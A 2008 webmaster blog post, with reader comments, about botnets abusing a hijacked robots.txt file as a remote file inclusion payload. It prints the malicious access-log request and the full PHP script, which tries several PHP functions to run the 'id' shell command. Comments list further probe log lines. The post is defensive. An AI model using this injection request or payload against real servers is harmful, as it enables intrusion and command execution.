Friday, January 18, 2008

Botnet Whacks ROBOTS.TXT File

Just when you think having your server hacked is bad enough, these idiots start messing with your robots.txt file.

Here's an example:

83.133.96.246 "GET //errors.php?error=http://www.thefalife.com/robots.txt??? HTTP/1.0" "libwww-perl/5.48"
What did that robots.txt contain?
<?php
echo "549821347819481
";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."
";
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
Looks like botnets are now OK with messing up your search engine positions as well as messing up your server.

Just imagine that all the pages or images you have blocked are suddenly crawled.

Then imagine that every junk crawler you've denied is suddenly crawling all over your site.

It could take months or years to clean up the damage, if ever.

Fun, huh?

3 comments:

Anonymous said...

I must great blog, stumpled across it while googling "204.15.64.0/21"

I find your articles on the proxies a bit amusing. I guess everyone is intitled to their own opinion.
though resposbile proxy operators should learn to use robots.txt and block access to the cgiproxy directoires from being crawled.

anyways,

You have some other great content here, keep up the good blog I enjoyed reading it.

IncrediBILL said...

Bob,

Glad you enjoyed the blog ;)

You wouldn't find proxies nor my opinions about them amusing if you were abused by them as much as I have been.

Got attacked by some idiot using a bunch of proxies this weekend so I'm building more walls around the proxies just to keep more out.

Anonymous said...

I see almost constant probes for remote file inclusion (RFI) and know exploitable files.

Todays log:
19:07:36 ... 38.101.72.8 GET //comments-display-tpl.php
19:11:05 ... 63.247.139.144 GET //comments-display-tpl.php
19:13:13 ... 206.221.184.180 GET //comments-display-tpl.php
19:22:08 ... 80.74.241.22 GET //comments-display-tpl.php